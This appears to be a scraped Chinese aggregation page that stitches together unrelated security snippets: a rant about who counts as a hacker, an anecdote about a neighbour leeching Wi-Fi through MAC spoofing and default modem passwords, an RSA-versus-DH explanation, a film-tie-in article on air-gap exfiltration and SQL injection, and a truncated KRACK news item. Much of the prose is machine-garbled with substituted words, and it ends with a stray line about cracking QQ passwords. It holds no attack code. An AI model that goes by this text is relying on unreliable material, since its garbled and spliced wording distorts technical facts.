他们躲在暗中的一角,会一点蹩脚的语言,一些东西和脚本。
他们刷钻,说我是“黑客”;
他们垂纶,说我是“黑客”;
他们改个页面,说我是“黑客”;
他们那开源的代码,写出一个bug满天飞的木马,说我是“黑客”;
他们拿到网上公然的一些库后,从速去别的站乱试,说我是“黑客”
媒体种种火上浇油,一个高中生,由于学校办事器暗码就存在机房一个分享给全部人的文件夹里,拿到暗码然后在办事器放肆粉碎,居然能被媒体称作“黑客”(#‵′)凸
写熊猫烧香那哥们,为啥进去一次又进去了,由于听说他只会两样东西:这也不会,那也不会。
为什么他们能实现某些媒体口中说的“灿烂战绩”?
2、某些网站大概应用做的至心那啥。不过要知道,就像是要做一壁镜子和摔坏一壁镜子,创造总是比毁灭要难上很多,修复偶然间也不是太容易。别的随着IT行业分工细化,每每两个模块之间就容易孕育产生种种“Vulnerability(海内常说的弊端,着实英文原意是缺点,千里之提,溃于蚁穴,紧张的事变说三遍,实际上,没有绝对寂静的体系,没有,真的没有。就算某厂家的售前号称本身的全面办理方案自作粉饰,我也没听到他们研发的人说你和我的产品能确保你们的寂静)”。
——————————————————————————————————————————
接下来便是说新期间的黑客,如今他们更乐意说本身是白帽子(白帽黑客)。
着实白帽和灰帽我都挺敬佩的,他们每每有很多很锋利的技能,至心niubility,但是却很低调,也乐意分享本身的头脑。
这些人要是做黑产(玄色财产链便是上面说的刷钻啊,盗号啊,电信诈骗啊,qq/微信诈骗啥的,种种只有你和我想不到,没有他们做不到),绝逼可以日进斗金,但是他们选择了做寂静相干的事变,拿着跟他们的技能不相称的薪水。
-----------------------------------------------------------------------------------------------------------------------------
要是题主对这方面感兴趣,可以先看看Freebuf如许的网站www.freebuf.com
另有各大XSRC吧,上面会有挺多东西能学习的
要是有肯定的底子,走走乌云()、补天(),提交点东西也挺不错的,这种机制可以或许让你有点小小的成绩感,能加快一个菜鸟的生长。
固然,要是有机遇,能进入到海内的寂静公司事变,你就更能相识黑客代表的是什么了
忘了说了,BAT等至公司的寂静部分也很好
扫一扫分享到微信
讲个刚刚经历的事呀,也许能给你些灵感。
老王是一个节俭的人,不愿意花钱去安装宽带,互联网只有摩擦。有一天,他发现我的Wi-Fi密码很简单,没有改变,大概是女孩,白人。所以他站在我的Wi-Fi边缘,我...
&&讲个刚刚经历的事呀,也许能给你些灵感。& & & & 老王是一个节俭的人,不愿意花钱去安装宽带,互联网只有摩擦。有一天,他发现我的Wi-Fi密码很简单,没有改变,大概是女孩,白人。所以他站在我的Wi-Fi边缘,我经常觉得网卡太多,也怪老路由器和中国电信。以这种方式,即使在1或2年中。直到上周五,除了我的设备外,在空中播放的画面中出人意料地发现,有一个“研究”。您知道AirPlay仅支持LAN设备,更重要的是网络盒、智能电视、AppleTV,但是大量的流量!我只是认为王真的升级到了在极端情况下使用的30m流量!白色是一个网络游戏盒和在线视频给那些认为喜爱戏剧的人会更多的卡片,突然感到生气。要检查联机设备无线路由器的列表,但只检查我的一些设备,每个MAC地址都是正确的。 & & &&& & & &感谢百度。她可以提供及时的信息,世界上的原始RUB卡,RUB网络软件,伪装MAC,还有很多其他我无法阅读的名词。双方都不理解,最后可以确认我在网络的边缘,或者使用特殊的设备或特殊的技术。我知道,准备好把他赶出去。考虑到他修改了MAC地址,IP隐藏在LAN中,使用ARP-A很难找到他。首先,他盗用了一个设备MAC的调查,我将自己的设备在Wi-Fi在线设备的更改列表之后关闭一个WiFi。多个设备不尝试继续搜索。“如何在互联网上摩擦网络”,被发现伪装成网关是一种方式。& & & 接下来,我遇到了一个神奇的时刻。我登录到电信CAT,所有的设备和两台路由器都是CATTelecom(电信、无线)的网络设备信息,IP地址和路由段不一致。我不明白,应该只有两个猫电信设备,一台有线主机,一台无线路由器。但是同一设备的几个IP地址也很奇怪,我决定重启电信猫,重启后的日志管理界面,但是在被踢下几秒钟后,显示一个用户登录,原来的以太网主机IP被占用。重新登录后等待240秒,更改密码(CAT电信电信公司太差,不能直接更改用户名),结果需要重新启动(等待240秒),他的设备可以自动更新密码)。& & 关闭无线电信以重新启动CAT、CAT、成功登录,此网络设备信息仅在主机的MAC地址中,无电CATMAC。我终于明白他是怎么来的。第一,他知道无线电路由我的密码,也可以猜测猫电信的登录和密码(第一故障,我不认为无线功能不改变对CAT的密码),然后,无线路由设备使用诸如MAC之类的中继站将伪装为电信CATMAC地址,所以即使我登录到电信CAT,在内部网络设备中看到电信CAT的地址可能是不奇怪的。在老王决定出网时,我决定不要轻举妄动,甚至对敌人发出警告。2.4G,用户名和密码没有改变,也抑制了直接推视频到他的电视或盒子的冲动。在已知的事件序列非常简单,没有通过CAT登录密码、WiFi密码、没有隐藏的无线电(我认为它们的使用是不方便的)来进行修订和电信线路。但它不能避免下一次摩擦,抗摩擦网络功能和小米的路由不是很及时的。& & 现在想想,也有一点老王还算厚道,没有直接改我电信猫的登录密码,虽说可以通过重启解决,毕竟很麻烦,也许还要找电信工程师上门。
扫一扫分享到微信
1.RSA做密钥协商时,可以防备中间人打击。2.最大区别在于RSA做密钥协商不提供PFS(PerfectForwardSecrecy)特性,而DH提供PFS特性。另有,DH要多发送一个DH公钥。3.如今实际利用中,优先选择ECDHEDHEDH,RS...
&&&&1.RSA做密钥协商时,可以防备中间人打击。&&&&2.最大区别在于RSA做密钥协商不提供PFS(PerfectForwardSecrecy)特性,而DH提供PFS特性。另有,DH要多发送一个DH公钥。&&&&3.如今实际利用中,优先选择ECDHEDHEDH,RSA...等(这重要是由于ECDHE和DHE是PFS的算法,自从斯诺登变乱之后,开始盛行)&&&&可以参考Mozilla的这个文档:&&&&详解:&&&&TLS中的算法分为4类,&&&&authentication(认证)算法&&&&keyexchange(密钥互换)算法&&&&encryption(加密)算法&&&&messageauthenticationcode(消息认证码简称MAC)算法&&&&DH是密钥互换算法的一种。&&&&RSA比较特别,重要当作authentication(认证)算法来用,但是也可以当作密钥互换算法来用,一身二任。&&&&中间人打击的题目,是通过authentication(认证)算法,共同pki证书体系(表如今客户端内置的root证书),来办理的,和密钥协商算法无关。&&&&当密钥协商算法选择RSA时,authentication(认证)算法一样平常也选择RSA(作为认证算法的RSA办理了中间人打击的题目)。&&&&tls1.2定义在rfc5246:&&&&此中对RSA做密钥协商和认证的表明:&&&&WithRSA,keyexchangeandserverauthenticationarecombined.The&&&&publickeyiscontainedintheserver'scertificate.Notethat&&&&compromiseoftheserver'sstaticRSAkeyresultsinalossof&&&&confidentialityforallsessionsprotectedunderthatstatickey.&&&&TLSusersdesiringPerfectForwardSecrecyshoulduseDHEcipher&&&&suites.Thedamagedonebyexposureofaprivatekeycanbelimited&&&&bychangingone'sprivatekey(andcertificate)frequently.&&&&Afterverifyingtheserver'scertificate,theclientencryptsa&&&&pre_master_secretwiththeserver'spublickey.Bysuccessfully&&&&decodingthepre_master_secretandproducingacorrectFinished&&&&message,theserverdemonstratesthatitknowstheprivatekey&&&&correspondingtotheservercertificate.&&&&WhenRSAisusedforkeyexchange,clientsareauthenticatedusing&&&&avaluederivedfromallprecedinghandshakemessages.These&&&&handshakemessagesincludetheservercertificate,whichbindsthe&&&&signaturetotheserver,andServerHello.random,whichbindsthe&&&&signaturetothecurrenthandshakeprocess.如有错误,欢迎指出。
扫一扫分享到微信
,我是一个三流的影评人!只为开心而观影!珍...
时隔四年,谍影重重系列再次显影,虽然帕金森氏的手持摄影让影迷们在紧凑的剧情中觉得略为晕眩,但去过火星、种过土豆、会格斗、会飙车的马特·达蒙叔叔依然把妹子们迷的不要不要的。新角色艾丽·西亚维坎德...
时隔四年,谍影重重系列再次显影,虽然帕金森氏的手持摄影让影迷们在紧凑的剧情中觉得略为晕眩,但去过火星、种过土豆、会格斗、会飙车的马特·达蒙叔叔依然把妹子们迷的不要不要的。新角色艾丽·西亚维坎德的干练与高超的特工技术也收获了一批迷弟。那《谍影重重5》中的特工技术(也是黑客技术)在现实生活中真的可以实现吗?雷锋网(搜索“雷锋网”公众号关注)来帮你盘一盘。  开盘前先简单介绍下文中会提到的人物关系,杰森·伯恩在一次执行任务中出现了意外,并被当成了中情局的叛逆者,为了保护自己,杰森·伯恩过上了隐姓埋名的日子。而尼基·帕森基曾与杰森·伯恩共同执行任务时产生了感情,她想通过自己的方式,帮助杰森·伯恩。海瑟·李是中情局的一名新任高管。  一个U盘就能远程开了中情局的后门?  影片一开始,中情局就被黑了,一名特工告诉中情局的高官,这次可能比斯诺登事件还要严重。不了解斯诺登事件的同学,我们再来一起回顾一下。  2013年6月,前中情局职员爱德华·斯诺登向媒体爆料,NSA和FBI于2007年启动了一个代号为“棱镜”的秘密监控项目。通过进入微软、谷歌、苹果、雅虎等九大互联网巨头的服务器,对全国的电子邮件、聊天记录、视频及照片等个人隐私进行监控。影片中的深梦公司就是其中一家互联网公司的代表。事后,斯诺登得到了俄罗斯的庇护,网络安全也进入了“后斯诺登时代”。  中情局是怎么被黑的?杰森·伯恩的老搭档尼基·帕森基为了帮他重回正常人的生活,在萨科夫的黑客基地,用一个U盘,就打开了中情局所有主机密文件的后门。&这个U盘不是普通的U盘,内部装有恶意软件USBee (USB蜜蜂),就像是在不同的花朵之间往返采集蜂蜜一样,装有USBee的U盘无需任何改装,就可以变成数据传输器,在有物理隔离措施的电脑之间任意往返采集数据。  USBee的兼容性十分强,几乎可以在任何U盘上使用,数据传输速率也非常高,仅用10秒的时间就可以把4096比特的密钥“偷”到手。其研发者是以色列Ben-Gurion大学网络安全研究中心的首席研发负责人Mordechai Guri,Guri同时也是Morphisec端点安全解决方案公司(Morphisec Endpoint Security Solutions)的CEO。据Guri介绍,  USBee的工作原理是通过向USB设备发送一系列“0”,来使USB发出频率在240兆赫兹到480兆赫兹的电磁信号。通过精准地控制这些频率,电磁辐射可以被调制成信号传输器,并由附近的接收器读取并解调。  这名以色列安全专家所属的团队,之前还发布了一系列通过设备噪音或声波来窃取数据的工具。如:  可以利用热交换传输数据的BitWhisper;  把电脑的显卡变成一个FM信号发射器的AirHopper;  以及通过电脑风扇噪音就能传输数据的Fansmitter。  然而,影片中的技术是经过渲染夸大的。现实操作中,USBee 的运行是有距离限制的。常见的微型U盘上,USB 蜜蜂的传输距离约为2.7米,如果是带有电线的USB设备,其电线可以被用作接收信号的天线,距离便可扩大到8米左右。亦或是,有内部工作人员将已感染病毒的U盘插入了公用网络内,才可以为所欲为。  SQL注入攻破数据库是怎么实现的?  尼基·帕森基在萨科夫的黑客基地对中情局进行入侵时,屋里的一位女黑客大声说道:“利用SQL注入攻破他们的数据库。”这位女黑客提到的SQL注入是攻击数据库的常用手段之一。    所谓SQL注入,就是通过把SQL命令插入到Web表单提 交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说:  它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。之前很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击。  反追踪技术是你想追就能追到吗?  当尼基·帕森基正在边拷贝边读取中情局各种秘密行动的数据时,海瑟·李迅速利用反向追踪代码定位到了黑客基地。  反向追踪技术是指IP反向追踪技术(IP traceback)就是指用来确定IP数据包的发送源地址时所利用的有效方法。对于反黑客人员来说,怎么能追踪到攻击的发起方,是识别和阻止攻击以及追究责任的重要桥梁。但反追踪技术必须在攻击正在进行时才有效,一旦攻击停止,反追踪技术进程也会中断。    虽然尼基·帕森基在黑客基地探测到外部追踪后立刻用酒浇电缆,引燃主机,但海瑟·李已在的U盘中植入了追踪代码。剧情也由此走向了高潮。  尼基·帕森基和杰森·伯恩会面后,中情局为了将两个人抓获,将希腊当地所有的摄像头上传,并启动实时监控系统。随后还黑入冰岛电网与德国CCTV系统。虽然美国政府再厉害也不敢公开表现的如此无所不能,但是通过最近的希拉里邮箱泄露事件与NSA被黑事件,可以从侧面说明,这些黑客技术确实在现实生活中可以实现,只是没有电影中表现的那么简单。  通过非智能手机就能黑了对方的电脑?  一心想寻找答案的杰森·伯恩找到尼基·帕森基的对接人后,通过电脑读取U盘数据时,海瑟·李利用房间里的一部很旧的手机仅用两分钟的时间就接入了正在读取U盘数据的电脑,并迅速删除了所有文件。这一技术的研究成果也是来自以色列的同一个团队。该团队使用了一个上市9年的摩托罗拉手机来演示这种新型的攻击方式,这款手机缺乏现代智能手机的一些功能,比如WiFi和移动数据连接功能。  该团队研究人员将一个特定的恶意软件安装在了目标计算机和手机后,一旦这个特定的恶意软件安装成功,就可以通过计算机自然发出的电磁波方式,提取到目标计算机中的数据。  实现以上技术所需的工具只有三样:GSM网络、一台普通的低端手机、以及电磁波。  影片的黑客技术介绍完了,但雷锋网不鼓励盗版,喜欢这部电影的同学趁电影还没有下线快去电影院里过把瘾吧!
扫一扫分享到微信
比利时研究人员今日表示:WPA2安全加密协议已经被破解。如果你朋友圈里有一两个略懂一些技术的好友,那么他一定在昨天已经转发过了相关的新闻。也许你对这条充满技术词语的新闻并不关心,除非我们换一种说...
比利时研究人员今日表示:WPA2安全加密协议已经被破解。如果你朋友圈里有一两个略懂一些技术的好友,那么他一定在昨天已经转发过了相关的新闻。也许你对这条充满技术词语的新闻并不关心,除非我们换一种说法:你能连接到的绝大多数WIFI在一夜之间都不安全了,甚至你通过自己家路由器的WIFI上网,都有可能被盗号。安全专家MathyVanhoef表示:“该漏洞影响了许多操作系统和设备,包括Android,Linux,Apple,Windows等。”这个概念验证攻击被称作“KRACK”(密钥重装攻击),详细破解方法和视频演示已在krackattacks.com网站上公布。WPA2是什么?WPA全称为Wi-FiProtectedAccess,有WPA和WPA2两个标准,是一种保护无线网络安全的加密协议。用更通俗一点的话来说,我们都知道连接到大多数WIFI是要输入密码的,这一过程不止用于防止蹭网,其实更重要的是验证你的手机和路由器之间的通信没有被别人窃取。毕竟,对于满世界乱飘的无线数据来说,就好像是你从手机端寄一个快递到同一个小区的路由器家。因为你手机也不知道路由器住在哪,所以会把包裹放在货架上写明“路由器收”。如果所有人都遵循规则,那么每个使用WIFI的终端只要到货架上去找写着自己名字的包裹就可以了。然而攻击者并不管这些,会把你的包裹拿来拆开,然后在里面放上自己伪造的数据。如果WIFI都采用不加密的方式传输数据,那你平时看了什么奇怪网站,下了什么小电影,你邻居可是一清二楚。不过当然最重要的是,有些App和网站的密码,也可能因此而泄露。在WPA这种加密方式被大规模应用之前,加密方式主要是WEP(WiredEquivalentPrivacy),由于每个数据包都使用相同的加密密}

我要回帖

更多关于 黑客qq账号和密码破解 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信